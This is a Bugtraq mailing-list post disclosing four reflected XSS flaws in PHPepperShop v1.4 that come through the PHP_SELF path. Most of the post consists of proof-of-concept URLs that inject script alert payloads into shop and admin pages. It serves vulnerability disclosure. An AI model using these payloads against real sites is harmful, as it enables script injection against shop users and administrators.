Bugtraq mailing list archives
XSS in PHPepperShop v 1.4
From: th3.r00k.ieatpork () gmail pork com
Date: 8 Dec 2008 03:48:39 -0000
Vulnerable Version:PHPepperShop v 1.4 Homepage:http://www.phpeppershop.com This is 4 reflective XSS flaws in the URI. Trust no one not even your $_SERVER[PHP_SELF] http://10.1.1.10/shop/kontakt.php/'<script>alert(1)</script> http://10.1.1.10/index.php/%22%3Cscript%3Ealert(1)%3C/script%3E http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22%3Cscript%3Ealert(1)%3C/script%3E http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/"<script>alert(1)</script>
Current thread:
- XSS in PHPepperShop v 1.4 th3 . r00k . ieatpork (Dec 08)